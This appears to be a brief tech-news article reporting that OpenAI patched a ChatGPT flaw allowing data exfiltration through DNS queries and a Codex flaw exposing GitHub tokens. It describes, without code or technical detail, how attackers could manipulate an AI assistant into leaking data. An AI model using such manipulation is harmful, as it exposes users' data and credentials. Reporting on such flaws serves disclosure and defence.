ATLA WIRE

OpenAI Patches ChatGPT Data Exfiltration Flaw and Codex GitHub Token Vulnerability

31.03.2026
19322
OpenAI Patches ChatGPT Data Exfiltration Flaw and Codex GitHub Token Vulnerability
ChatGPT and Codex flaws patched Feb 2026 exposed DNS exfiltration and GitHub tokens, raising enterprise AI security risks.

OpenAI Just Patched Two Nasty AI Security Holes — ChatGPT Could've Leaked Your Data via DNS

OpenAI just dropped patches for two critical vulnerabilities in ChatGPT and Codex that could've let attackers exfiltrate data via DNS queries and steal GitHub tokens. If you're using AI in your enterprise stack, this is your wake-up call.
The ChatGPT flaw, patched in February 2026, was a DNS exfiltration vulnerability. Attackers could've manipulated the AI to send sensitive data through DNS queries — basically using the system's own infrastructure against it. Think of it as a digital Trojan horse hiding in plain sight.
Meanwhile, Codex had a GitHub token vulnerability that could've exposed authentication credentials. This isn't just theoretical — real enterprise environments could've had their repositories compromised if attackers got their hands on those tokens.
Both vulnerabilities highlight the growing attack surface as AI gets integrated into business workflows. When your AI assistant can potentially leak your data or access your code repositories, that's not just a bug — that's a business risk.
Article image 1
  • ChatGPT DNS exfiltration vulnerability patched February 2026
  • Codex GitHub token vulnerability also patched
  • Both flaws could enable data theft in enterprise environments
  • Highlights growing AI security risks as adoption increases
The timing matters — these patches dropped in February 2026, but the public disclosure just happened. If you're running older versions of these AI systems, you might still be vulnerable. Enterprise security teams need to verify their AI deployments are updated.
This isn't just about OpenAI — it's about the entire AI security ecosystem. As more companies integrate ChatGPT, Codex, and similar tools into their operations, vulnerabilities like these become pathways for real-world attacks. The line between 'cool AI feature' and 'security risk' just got thinner.
#ChatGPT#OpenAI#AI security#security patches#data leak#vulnerabilities in AI systems#AI system vulnerabilities
Got a topic? Write to ATLA WIRE on Telegram:t.me/atla_community
Banner | ATLA WIRE
ATLA WIRE